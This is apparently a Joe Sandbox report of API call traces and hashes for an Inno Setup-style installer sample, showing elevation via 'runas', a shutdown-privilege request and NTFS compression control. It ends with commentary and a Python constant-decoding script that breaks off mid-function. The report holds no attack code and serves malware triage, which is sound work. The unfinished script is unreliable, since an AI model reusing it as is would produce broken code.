  • Part of subcall function 00476E18: CloseHandle.KERNEL32(00000000,?,?,?,02192BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E92
  • Part of subcall function 00476EF0: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00476F82,?,?,?,02192BDC,?,00476FE4,00000000,004770FA,?,?,-00000010,?), ref: 00476F20
• ShellExecuteEx.SHELL32(0000003C), ref: 00477034
• GetLastError.KERNEL32(00000000,004770FA,?,?,-00000010,?), ref: 0047703D
• MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0047708A
• GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 004770AE
• CloseHandle.KERNEL32(00000000,004770DF,00000000,00000000,000000FF,000000FF,00000000,004770D8,?,00000000,004770FA,?,?,-00000010,?), ref: 004770D2
Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                                    • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                    • API String ID: 883996979-221126205
                                                                                    • Opcode ID: cdfc9ed65273480b993f908da37bc8b157bd69d2ac5039e997c7e7ab6857fd80
                                                                                    • Instruction ID: 1ba95e0e0868ac7cc54db30065146fef24764d75c8f79a60f30d4c8031701125
                                                                                    • Opcode Fuzzy Hash: cdfc9ed65273480b993f908da37bc8b157bd69d2ac5039e997c7e7ab6857fd80
                                                                                    • Instruction Fuzzy Hash: 6F3162B0A04648AADB10EFAAC841ADEB7B9EF05314F90843BF508F7382D77C59048B59
                                                                                    APIs
                                                                                    • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00422A04
                                                                                    • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BCE), ref: 00422A14
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSendShowWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1631623395-0
                                                                                    • Opcode ID: 2c26266a8c67d7a7ed143539e2fbf203b7c134ad6664bcde8bffe5e01bbb34f6
                                                                                    • Instruction ID: 39dda2673d0f757005a7c2ebbeab04d2226afc2b16c541db07efabb99d57c27a
                                                                                    • Opcode Fuzzy Hash: 2c26266a8c67d7a7ed143539e2fbf203b7c134ad6664bcde8bffe5e01bbb34f6
                                                                                    • Instruction Fuzzy Hash: 8B916171B04214BFD710EFA9DA86F9D77F4AB04314F5500B6F904AB3A2CB78AE409B58
                                                                                    APIs
                                                                                    • IsIconic.USER32(?), ref: 004183A3
                                                                                    • GetWindowPlacement.USER32(?,0000002C), ref: 004183C0
                                                                                    • GetWindowRect.USER32(?), ref: 004183DC
                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 004183EA
                                                                                    • GetWindowLongA.USER32(?,000000F8), ref: 004183FF
                                                                                    • ScreenToClient.USER32(00000000), ref: 00418408
                                                                                    • ScreenToClient.USER32(00000000,?), ref: 00418413
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                    • String ID: ,
                                                                                    • API String ID: 2266315723-3772416878
                                                                                    • Opcode ID: bc370706f242ec70077bf36f1e1d3e6d0ab536e6ab9c2c39735764bf232ebbb5
                                                                                    • Instruction ID: f1655e9c1aaa1f9d3e17845697c0dfec8ab0781743990dff6cd0a114faef5a7c
                                                                                    • Opcode Fuzzy Hash: bc370706f242ec70077bf36f1e1d3e6d0ab536e6ab9c2c39735764bf232ebbb5
                                                                                    • Instruction Fuzzy Hash: D6112B71505201AFDB00EF69C885F9B77E8AF49314F18067EBD58DB286D738D900CBA9
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000028), ref: 00454B0F
                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00454B15
                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00454B2E
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00454B55
                                                                                    • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00454B5A
                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00454B6B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                    • String ID: SeShutdownPrivilege
                                                                                    • API String ID: 107509674-3733053543
                                                                                    • Opcode ID: 4672a8203829a771e5d00f2c17f761bc323a5d0378d5eda1ad4e77e08b45408c
                                                                                    • Instruction ID: 73069b54807863efa740a64668e3ddc19e7753e901194602af91027a354c2964
                                                                                    • Opcode Fuzzy Hash: 4672a8203829a771e5d00f2c17f761bc323a5d0378d5eda1ad4e77e08b45408c
                                                                                    • Instruction Fuzzy Hash: FDF0687068430275E610AA758C07F2B21989784B5DF50492EBE45EE1C3D7BCD44C8A6E
                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045C8B1
                                                                                    • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045C8C1
                                                                                    • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045C8D1
                                                                                    • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047DFC7,00000000,0047DFF0), ref: 0045C8F6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$CryptVersion
                                                                                    • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                                    • API String ID: 1951258720-508647305
                                                                                    • Opcode ID: 7e27a9db68ce5781c7a285243bc6d328b0b1bffa5381604cafab58ca7bab5c59
                                                                                    • Instruction ID: b92a23805cb6ee5c0910e5f81ef8443a356b34338ef2df7ef9b51b6282c91381
                                                                                    • Opcode Fuzzy Hash: 7e27a9db68ce5781c7a285243bc6d328b0b1bffa5381604cafab58ca7bab5c59
                                                                                    • Instruction Fuzzy Hash: 87F049F0901700DEDB14DF76BEC633B7695E7A8316F18803BA619A51A2D738044CCA5C
                                                                                    APIs
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,004966A6,?,?,00000000,0049A628,?,00496830,00000000,00496884,?,?,00000000,0049A628), ref: 004965BF
                                                                                    • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 00496642
                                                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,0049667E,?,00000000,?,00000000,004966A6,?,?,00000000,0049A628,?,00496830,00000000), ref: 0049665A
                                                                                    • FindClose.KERNEL32(000000FF,00496685,0049667E,?,00000000,?,00000000,004966A6,?,?,00000000,0049A628,?,00496830,00000000,00496884), ref: 00496678
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$AttributesCloseFirstNext
                                                                                    • String ID: isRS-$isRS-???.tmp
                                                                                    • API String ID: 134685335-3422211394
                                                                                    • Opcode ID: e40fe840e367864820aded220cbe64f4e75f2107195e16c4ed2d0cc84f0cff06
                                                                                    • Instruction ID: 7c4f1729e62c340c3776f645c08a9404eac4e90145c78096892548085370b188
                                                                                    • Opcode Fuzzy Hash: e40fe840e367864820aded220cbe64f4e75f2107195e16c4ed2d0cc84f0cff06
                                                                                    • Instruction Fuzzy Hash: 1A31867190161CAFDF10EF65CC51ACEBBBDDB45314F5144B7A808A32A1EA389F458E58
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(oleacc.dll,?,0044E8DD), ref: 0044C03F
                                                                                    • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C050
                                                                                    • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C060
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                    • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                                    • API String ID: 2238633743-1050967733
                                                                                    • Opcode ID: c7875b5020b1a0fc70af70b5d3619db3f858b3da6b6721b5bb5bec507322b540
                                                                                    • Instruction ID: 768994a2e6e1f30713717b1c29876c1fd16d3b2562f205e666220538aba0b6e7
                                                                                    • Opcode Fuzzy Hash: c7875b5020b1a0fc70af70b5d3619db3f858b3da6b6721b5bb5bec507322b540
                                                                                    • Instruction Fuzzy Hash: BBF01CB0242701CAFB609FF5ECC672632B4E364708F18557BA0016A2E2C7BD9494CF5E
                                                                                    APIs
                                                                                    • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00456809
                                                                                    • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00456830
                                                                                    • SetForegroundWindow.USER32(?), ref: 00456841
                                                                                    • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00456B19,?,00000000,00456B55), ref: 00456B04
                                                                                    Strings
                                                                                    • Cannot evaluate variable because [Code] isn't running yet, xrefs: 00456984
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                                    • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                    • API String ID: 2236967946-3182603685
                                                                                    • Opcode ID: ea9aa7693e661e956a57dff5922af77563df319d7d3b4e1966ed1c34fece0d0f
                                                                                    • Instruction ID: c3083c827e1ea9587a1b946928c79dead0c15e552dd32db2ac5f2442617c6554
                                                                                    • Opcode Fuzzy Hash: ea9aa7693e661e956a57dff5922af77563df319d7d3b4e1966ed1c34fece0d0f
                                                                                    • Instruction Fuzzy Hash: 6391ED34304204EFDB15DF55C961F5ABBF9EB89305F6280BAEC04A7392C639AE14CB59
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455467), ref: 00455358
                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045535E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                    • API String ID: 1646373207-3712701948
                                                                                    • Opcode ID: 272051455b5cb91d1d868c6395d7d8b05e26e0b6de4e27da94085abeb1e9e08c
                                                                                    • Instruction ID: 60eca4a99d751df3d3374a87c4cbf3116f086dd8a9115ea48f17d057e3f27308
                                                                                    • Opcode Fuzzy Hash: 272051455b5cb91d1d868c6395d7d8b05e26e0b6de4e27da94085abeb1e9e08c
                                                                                    • Instruction Fuzzy Hash: 0741A331A00649AFCF01EFA5D892AEFB7B8EF49305F504566F800F7252D67C5D088B69
                                                                                    APIs
                                                                                    • IsIconic.USER32(?), ref: 00417D1F
                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                                                    • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                                                    • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Placement$Iconic
                                                                                    • String ID: ,
                                                                                    • API String ID: 568898626-3772416878
                                                                                    • Opcode ID: 26b47a840ef5862fe313a436c6949d2016bb3e60c65edf9f9fab0a84da756b7f
                                                                                    • Instruction ID: 117db6d3727d0f94901dea8748b8d47281c3d2add8a8e77c7f929e434730b1f7
                                                                                    • Opcode Fuzzy Hash: 26b47a840ef5862fe313a436c6949d2016bb3e60c65edf9f9fab0a84da756b7f
                                                                                    • Instruction Fuzzy Hash: 41213171604208ABCF40EF69E8C0EEA77B8AF49314F05456AFD18DF246C678DD84CB68
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001,00000000,004635C1), ref: 00463435
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,00463594,?,00000001,00000000,004635C1), ref: 004634C4
                                                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,00463576,?,00000000,?,00000000,00463594,?,00000001,00000000,004635C1), ref: 00463556
                                                                                    • FindClose.KERNEL32(000000FF,0046357D,00463576,?,00000000,?,00000000,00463594,?,00000001,00000000,004635C1), ref: 00463570
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$CloseErrorFirstModeNext
                                                                                    • String ID:
                                                                                    • API String ID: 4011626565-0
                                                                                    • Opcode ID: e49648f109a0a58d0dd59af0c8e0b33ee568661d64b452756319b7b75e20b746
                                                                                    • Instruction ID: c18d1c41accea68cb41f5c12e74b437797437286b731c7b532b71dbbd74da020
                                                                                    • Opcode Fuzzy Hash: e49648f109a0a58d0dd59af0c8e0b33ee568661d64b452756319b7b75e20b746
                                                                                    • Instruction Fuzzy Hash: 7141C870A00658AFCB11EF65CC55ADEB7B8EB88309F4044BAF404A7391E73C9F448E59
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001,00000000,00463A67), ref: 004638F5
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,00463A32,?,00000001,00000000,00463A67), ref: 0046393B
                                                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,00463A14,?,00000000,?,00000000,00463A32,?,00000001,00000000,00463A67), ref: 004639F0
                                                                                    • FindClose.KERNEL32(000000FF,00463A1B,00463A14,?,00000000,?,00000000,00463A32,?,00000001,00000000,00463A67), ref: 00463A0E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$CloseErrorFirstModeNext
                                                                                    • String ID:
                                                                                    • API String ID: 4011626565-0
                                                                                    • Opcode ID: 9717836182e89b8284e108105af98bb591f0e4e25fd179eca548328e5960a9af
                                                                                    • Instruction ID: a32f7eebc160b2c926ffd988aba38ac49d653b749f4bb5a92982eb88da04d6a0
                                                                                    • Opcode Fuzzy Hash: 9717836182e89b8284e108105af98bb591f0e4e25fd179eca548328e5960a9af
                                                                                    • Instruction Fuzzy Hash: B6418175A00A58DBCB10EFA5DC859DEB7B8EB88305F4044AAF804E7341EB78DF458E49
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E7CA
                                                                                    • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E7F5
                                                                                    • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E802
                                                                                    • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E80A
                                                                                    • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E810
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                    • String ID:
                                                                                    • API String ID: 1177325624-0
                                                                                    • Opcode ID: e445e4d3b540bec23f5d4472a545cd66e54ba2727ac284448d8f04acb6f91a05
                                                                                    • Instruction ID: 97181128065a238999caafd211b152b701c4b4b5d95cf39bc3f304bf3469fa68
                                                                                    • Opcode Fuzzy Hash: e445e4d3b540bec23f5d4472a545cd66e54ba2727ac284448d8f04acb6f91a05
                                                                                    • Instruction Fuzzy Hash: 4FF0F0713917203AF620B17A6C82F7B018CCB85F68F10823ABB04FF1C1D9A84C06066D
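The CreateFileA/DeviceIoControl pair in the entry above deserves a closer look before the "communicates with device drivers" reading is accepted at face value. Read as Windows SDK constants, the trace arguments are dwDesiredAccess C0000000 (GENERIC_READ | GENERIC_WRITE), dwShareMode 1 (FILE_SHARE_READ), dwCreationDisposition 3 (OPEN_EXISTING), dwFlagsAndAttributes 02000000 (FILE_FLAG_BACKUP_SEMANTICS, which is what lets CreateFile open a directory handle), and a control code of 0009C040 with a 2-byte input buffer, which is exactly FSCTL_SET_COMPRESSION with its USHORT compression-state argument. That combination is consistent with toggling NTFS compression on an existing file or directory rather than with a channel to a kernel driver. The following script is an added example, not part of the Joe Sandbox report, that decodes these argument constants mechanically: it parses trace lines in the report's own "Api.MODULE(args), ref: addr" format (that format, and the small hand-picked table of control codes, are assumptions made here), splits the control code with the CTL_CODE layout from winioctl.h, and names the CreateFile flags.

```python
import re

# Added example, not part of the Joe Sandbox report: decode the argument
# constants in CreateFileA / DeviceIoControl trace entries.

# CTL_CODE as defined in winioctl.h:
# (DeviceType << 16) | (Access << 14) | (Function << 2) | Method
def ctl_code(device_type, function, method, access):
    return (device_type << 16) | (access << 14) | (function << 2) | method

FILE_DEVICE_DISK = 0x07
FILE_DEVICE_FILE_SYSTEM = 0x09
METHOD_BUFFERED = 0
FILE_ANY_ACCESS = 0
FILE_READ_DATA = 1
FILE_WRITE_DATA = 2

# Hand-picked table (assumption: extend from winioctl.h for other codes).
KNOWN_CODES = {
    ctl_code(FILE_DEVICE_FILE_SYSTEM, 15, METHOD_BUFFERED, FILE_ANY_ACCESS): "FSCTL_GET_COMPRESSION",
    ctl_code(FILE_DEVICE_FILE_SYSTEM, 16, METHOD_BUFFERED, FILE_READ_DATA | FILE_WRITE_DATA): "FSCTL_SET_COMPRESSION",
    ctl_code(FILE_DEVICE_DISK, 0, METHOD_BUFFERED, FILE_ANY_ACCESS): "IOCTL_DISK_GET_DRIVE_GEOMETRY",
}
DEVICE_TYPES = {FILE_DEVICE_DISK: "FILE_DEVICE_DISK", FILE_DEVICE_FILE_SYSTEM: "FILE_DEVICE_FILE_SYSTEM"}
METHODS = ["METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER"]

def decode_ctl_code(code):
    """Split a DeviceIoControl control code into its CTL_CODE fields."""
    device = (code >> 16) & 0xFFFF
    return {
        "device_type": DEVICE_TYPES.get(device, hex(device)),
        "access": (code >> 14) & 0x3,
        "function": (code >> 2) & 0xFFF,
        "method": METHODS[code & 0x3],
        "name": KNOWN_CODES.get(code, "unknown"),
    }

# CreateFile constants from winnt.h / fileapi.h.
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODES = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITIONS = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = {0x80000000: "FILE_FLAG_WRITE_THROUGH", 0x40000000: "FILE_FLAG_OVERLAPPED",
              0x04000000: "FILE_FLAG_DELETE_ON_CLOSE", 0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
              0x00000080: "FILE_ATTRIBUTE_NORMAL"}

def set_bits(value, table):
    """Names of the table entries whose bit is set in value, in table order."""
    return [name for bit, name in table.items() if value & bit]

def decode_create_file(args):
    """args: CreateFileA parameters in call order (lpFileName, dwDesiredAccess, ...)."""
    return {
        "access": set_bits(args[1], GENERIC_ACCESS),
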